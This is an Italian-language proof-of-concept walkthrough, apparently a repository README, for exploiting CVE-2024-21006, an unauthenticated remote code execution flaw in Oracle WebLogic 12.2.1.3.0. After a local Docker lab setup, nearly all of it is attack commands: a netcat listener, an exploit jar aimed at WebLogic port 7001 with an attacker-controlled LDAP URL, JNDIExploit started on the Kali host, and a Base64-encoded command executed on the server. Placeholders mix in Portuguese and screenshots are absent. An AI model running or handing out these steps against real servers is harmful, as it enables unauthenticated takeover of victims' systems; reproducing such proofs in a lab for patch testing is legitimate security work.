
Esecuzione di codice in remoto (RCE) - Oracle WebLogic 12.2.1.3.0
La CVE-2024-21006 è una vulnerabilità critica di Remote Code Execution (RCE) che affligge Oracle WebLogic Server. Il difetto è legato all'uso non sicuro del protocollo IIOP (Internet Inter-ORB Protocol) e di JNDI (Java Naming and Directory Interface), consentendo a un attaccante remoto non autenticato di eseguire codice arbitrario sul server interessato tramite un riferimento JNDI malintenzionato.
Prepara l'ambiente:
docker-compose up -d
Per accedere alla shell di Kali:
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
Per accedere alla shell di WebLogic:
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
Per accedere alla shell di ExploitBox:
docker exec -it exploitbox /bin/bash
In questa fase, abbiamo un'istanza di WebLogic 12.2.1.3.0 in esecuzione localmente: http://127.0.0.1:7001/console/login/LoginForm.jsp

Su Kali:
nc -vnlp 1389
Su ExploitBox:
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 ldap://<IP do Kali>:1389
Osserva che Kali ha ricevuto la connessione proveniente da WebLogic:

Su Kali, avvia JNDIExploit:
cd /exploit
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <IP do Kali>

Su ExploitBox, esegui l'exploit:
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 "ldap://<IP do Kali>:1389/Basic/Command/Base64/<Comando em Base64>"

Su Kali, osserva che abbiamo ricevuto la richiesta:

Su WebLogic, osserva che il comando è stato eseguito e il file è stato creato con successo:
